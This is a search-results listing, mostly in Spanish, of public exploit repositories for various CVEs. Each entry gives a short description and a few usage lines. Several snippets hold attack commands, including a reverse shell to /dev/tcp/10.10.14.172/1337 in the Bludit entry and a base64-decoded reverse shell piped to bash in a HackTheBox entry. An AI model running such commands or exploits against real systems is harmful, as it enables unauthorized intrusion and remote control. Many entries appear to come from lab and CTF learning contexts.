628 matches found
cve-2023-20198
cve-2023-20198 Descripción. Prueba de concepto de 1vere$k sobre CVE-2023-20198 basada en el Blog. También incluye una verificación de respuesta hexadecimal según el artículo original de Cisco. El script funciona en dos modos: Modo check: solo realiza una conexión a la URL específica y verifica el...
CVE-2024-23692-RCE-in-Rejetto-HFS
Vulnerabilidad RCE no autenticada en Rejetto HTTP File Server CVE-2024-23692 - código de explotación CVE-2024-23692 es una vulnerabilidad crítica en Rejetto HTTP File Server HFS versión 2.3m, que permite la ejecución remota de código RCE sin autenticación. Esta falla permite a los atacantes...
CVE-2020-24186-exploit
CVE-2020-24186-exploit Script de explotación para CVE-2020-24186 Cómo usar el exploit: Comandos: Windows/Linux: python3 CVE-2020-24186.py -u -p Ejemplo: python3 CVE-2020-24186.py -u http://127.0.0.1 -p /wordpress/2022/04/04/hello-world...
CVE-2014-4688-NodeJs-Exploit
CVE-2014-4688 root@kitploit: sudo node --no-warnings exploit.js...
CVE-2018-16763-exploit
CVE-2018-16763-exploit Esta es una versión actualizada del CVE-2018-16763 para fuelCMS 1.4.1 El script se basa en el de https://www.exploit-db.com/exploits/47138 El script está actualizado para su uso con Python 3...
Variatype.htb-CVE-2025-66034
Hackthebox Season 10 - Variatype This script will get you initial access. First, Install required modules using pip pip3 install -r requirements.txt Usage python3 exploit.py 'id' or python3 exploit.py 'echo BASE64ENCODEDREVSHELL | base64 -d | bash'...
CVE-2019-16278-PoC
CVE-2019-16728-PoC CVE-2019-16728 Referencia https://git.sp0re.sh/sp0re/Nhttpd-exploits/src/branch/master/CVE-2019-16278.sh...
CVE-2019-7609-KibanaRCE
CVE-2019-7609-KibanaRCE Minor changes were made to the CVE to make it compatible with Python 3. cve-modific.py Here are the modifications: In the getkibanaversion function, the line match = re.findallpattern, r.content was updated to match = re.findallpattern, r.text. This change was made to use...
CVE-2012-2982_Python
CVE-2012-2982Python Script Python PoC como un ejercicio de tryhackme: https://tryhackme.com/room/intropocscripting Este es el metasploit CVE: https://www.exploit-db.com/exploits/21851 Esos son los cambios realizados después del descubrimiento del Exploit:...
CVE-2019-16113
CVE-2019-16113 CVE-2019-16113 - bludit = 3.9.2 RCE authenticate Usage python CVE-2019-16113.py -u http://10.10.10.10 -user user -pass secret -c "bash -c 'bash -i & /dev/tcp/10.10.14.172/1337 0&1'" Example...
CVE-2021-22986
CVE-2021-22986 Usage: python exploit.py -u...
test-task-CVE-2024-25600
test-task-CVE-2024-25600 Repositorio para la tarea de prueba de la pasantía. Paso 0: Clonar este repositorio git root@kitploit: git clone https://github.com/Sibul-Dan-Glokta/test-task-CVE-2024-25600 Paso 1: Crear contenedores Docker Iniciar el demonio Docker root@kitploit: sudo systemctl start...
Moodle-CVE-2018-1042
Moodle CVE-2018-1042 Script para explotar CVE-2018-1042 con el fin de realizar escaneos de puertos internos...
CVE-2021-31166
CVE-2021-31166 script bash simple para explotar CVE-2021-31166...
PAN-OS_CVE-2024-9474
python3 exp.py...
CVE-2018-7600
CVE-2018-7600 CVE-2018-7600 Exploit Cambia TARGET en exploit.py root@kitploit: $ python3 exploit.py Success: Check http://127.0.0.1:8080/hello.txt...
CVE-2023-34598
CVE-2023-34598 - Gibbon v25.0.0 LFI Exploit This repository contains a Python script that helps identify and exploit a local file inclusion LFI vulnerability CVE-2023-34598 in Gibbon v25.0.0. The script can scan a target website for potential vulnerability and, if successful, download the SQL dum...
CVE-2024-23897
uso root@kitploit: python3 exp.py...
CVE-2017-0290-
CVE-2017-0290- Hola, soy Gihad Alkmaty de Libia script CVE-2017-0290- especialista en aplastar Windows DEFINDER windows/8.1/10/...
CVE-2024-7399-POC
CVE-2024-7399 Exploit para CVE-2024-7399. Más detalles se pueden encontrar aquí: https://davidxbors.github.io/0xpages/posts/cve-2024-7399/. Uso: root@kitploit: python3 CVE-2024-7399.py https://localhost:7002/ --check python3 CVE-2024-7399.py https://localhost:7002/ --execute python3...